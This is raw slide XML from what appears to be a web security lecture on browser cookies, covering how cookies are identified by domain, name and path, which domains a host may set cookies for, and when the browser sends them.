            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>both cookies are in scope of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A4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E5CF9D-32D9-5847-B6CE-7B86D0196CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="2286000"/>
            <a:ext cx="2521844" cy="1754326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u="sng" dirty="0"/>
              <a:t>cookie 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value = 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test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secure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53CD70-704D-7549-8ED9-1A62CDFD3F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6599239" y="2286000"/>
            <a:ext cx="2042547" cy="1754326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u="sng" dirty="0"/>
              <a:t>cookie 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value = 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test123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E11452CB-7221-FC44-9474-7014AF471C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97652" y="4481285"/>
            <a:ext cx="212910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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>distinct cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54277" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EBEF602-4CD1-C24E-9491-4E3DCE2C10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3227" y="4192360"/>
            <a:ext cx="1228725" cy="581025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1187109 w 1229710"/>
              <a:gd name="T1" fmla="*/ 565718 h 580696"/>
              <a:gd name="T2" fmla="*/ 350043 w 1229710"/>
              <a:gd name="T3" fmla="*/ 501060 h 580696"/>
              <a:gd name="T4" fmla="*/ 0 w 1229710"/>
              <a:gd name="T5" fmla="*/ 0 h 580696"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1229710"/>
              <a:gd name="T10" fmla="*/ 0 h 580696"/>
              <a:gd name="T11" fmla="*/ 1229710 w 1229710"/>
              <a:gd name="T12" fmla="*/ 580696 h 58069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229710" h="580696">
                <a:moveTo>
                  <a:pt x="1229710" y="551793"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="898634" y="566244"/>
                  <a:pt x="567558" y="580696"/>
                  <a:pt x="362606" y="488731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157654" y="396766"/>
                  <a:pt x="78827" y="198383"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd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54278" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B347BC37-1ADD-5E4B-B71A-DF7ACE3670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47127" y="4192360"/>
            <a:ext cx="835025" cy="536575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 835572"/>
              <a:gd name="T1" fmla="*/ 560632 h 536028"/>
              <a:gd name="T2" fmla="*/ 673981 w 835572"/>
              <a:gd name="T3" fmla="*/ 428716 h 536028"/>
              <a:gd name="T4" fmla="*/ 811839 w 835572"/>
              <a:gd name="T5" fmla="*/ 0 h 536028"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 835572"/>
              <a:gd name="T10" fmla="*/ 0 h 536028"/>
              <a:gd name="T11" fmla="*/ 835572 w 835572"/>
              <a:gd name="T12" fmla="*/ 536028 h 53602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835572" h="536028">
                <a:moveTo>
                  <a:pt x="0" y="536028"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="277210" y="517634"/>
                  <a:pt x="554420" y="499241"/>
                  <a:pt x="693682" y="409903"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="832944" y="320565"/>
                  <a:pt x="834258" y="160282"/>
                  <a:pt x="835572" y="0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54279" name="Title 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8690B0A7-1A0C-AB4D-8707-24F2BB561E2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Cookie Are Identified by (domain, name, path)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14767227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A5E152-C81E-204C-BE1E-FE7A93393D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SOP for Writing Cookies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980A41-88D0-7640-844E-459210B50CC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2400" b="1" dirty="0"/>
              <a:t>Domain: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>any domain suffix of URL-hostname except top-level domain (TLD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Path: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>anything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FFD61DB-183A-1B4C-A7E3-AD73F697CA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2158" y="2134608"/>
            <a:ext cx="5352801" cy="6237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What cookies can be set by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>login.site.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E01085A0-EA02-7242-80F7-5D18DCA4A5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29911" y="2878774"/>
            <a:ext cx="2070567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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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ts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allowed domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A4"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A4"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48A8EEE6-6F96-474C-8DF1-74894ADD43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81203" y="2878774"/>
            <a:ext cx="2291012" cy="15542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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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ts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>disallowed domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user.site.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A4"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>othersite.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A4"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1692FF5E-F1A8-074B-A1C5-BD6C58CFCC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38828" y="3085647"/>
            <a:ext cx="587375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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5390AF-7227-E040-B744-79B2A6F14B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93841" y="3529513"/>
            <a:ext cx="50958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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{656AAB29-280F-2B47-AD23-C047422A57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93841" y="3148513"/>
            <a:ext cx="50958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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB9C6F3-96CE-5245-9466-53A668F846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27177" y="3910513"/>
            <a:ext cx="5095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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B16037AB-A6D5-484F-A7C6-7921642190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16603" y="3488872"/>
            <a:ext cx="587375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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="4000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2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281389E-BAC7-B941-9535-C008EA6B9918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292158" y="4716231"/>
            <a:ext cx="535280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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> can set cookies for all of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>but not for another site or TLD </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>					</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Problematic for sites like .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>cornell.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8DF4F0-8482-BB41-B940-254C5341CB7E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10744200" y="5100951"/>
            <a:ext cx="0" cy="614048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4771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025" name="Screen Shot 2019-04-23 at 10.20.40 AM.png" descr="Screen Shot 2019-04-23 at 10.20.40 AM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BADC99-C9E5-5045-92D7-F027EC90EC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128" y="1188524"/>
            <a:ext cx="10095744" cy="44809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95606979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Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70DA02C8-C9D4-8D4E-BE6B-0D14A058694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Sending Cookies by Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56322" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72D4E37E-50BC-B74A-AE27-00C925E38B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1974850"/>
            <a:ext cx="8686800" cy="3068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2053824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Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{177D2269-0108-5148-BFD2-AF84D61A0868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133600" y="3663045"/>
            <a:ext cx="8077200" cy="1948759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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Browser automatically sends all cookies in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>URL scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>cookie-domain is domain-suffix of URL-domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>cookie-path is prefix of URL-path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>protocol=HTTPS if cookie is “secure”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
